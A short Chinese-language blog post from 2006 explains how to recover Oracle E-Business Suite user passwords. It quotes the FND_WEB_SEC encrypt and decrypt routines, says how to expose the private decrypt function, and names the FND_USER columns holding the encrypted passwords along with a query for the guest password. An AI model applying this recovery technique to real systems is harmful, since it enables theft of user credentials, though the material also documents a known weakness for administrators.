破解 Oracle E-Business Suite 用户密码
Oracle December 13th, 2006
APPS.FND_WEB_SEC 管理着跟用户授权相关的数据,比如密码。
这个包里面有加密和解密函数:
-- Function to encrypt a string using a specified key.
-- 4257466 Changed this function to call the new overloaded version.
-- This is backwards compatible because null is returned if the profile
-- does not exist.
function encrypt(key in varchar2, value in varchar2)
return varchar2
is
begin
-- bug 4676957 Renamed password case sensitivity profile
return(encrypt(key, value, fnd_profile.value('SIGNON_PASSWORD_CASE')));
end;
-- Function to decrypt an encrypted string using a specified key.
function decrypt(key in varchar2, value in varchar2)
return varchar2
as language java name 'oracle.apps.fnd.security.WebSessionManagerProc.decrypt(java.lang.String,java.lang.String) return java.lang.String';
这两个函数的作用是调用java程序来运算(因而您甚至不必登录数据库来进行破解)。
由于是私有函数,若想在其他PL/SQL程序里调用,这必须在包头申明:
function encrypt(key in varchar2, value in varchar2) return varchar2; function decrypt(key in varchar2, value in varchar2) return varchar2;
EBS中用户密码存储在表 APPLSYS.FND_USER 中:
FND_USER.ENCRYPTED_USER_PASSWORD 用户密码
ENCRYPTED_FOUNDATION_PASSWORD key的加密字符串Oracle对于ENCRYPTED_FOUNDATION_PASSWORD的算法是:
encFndPwd := encrypt(user||'/'||pwd,fndPwd);事实上,所有用户的FOUNDATION_PASSWORD都是一样的,因而无需破解每一个user的ENCRYPTED_FOUNDATION_PASSWORD。获取GUEST的密码:
SELECT upper(fnd_profile.value('GUEST_USER_PWD')) FROM dual;参考:
Oracle Applications Passwords Decryption Vulnerability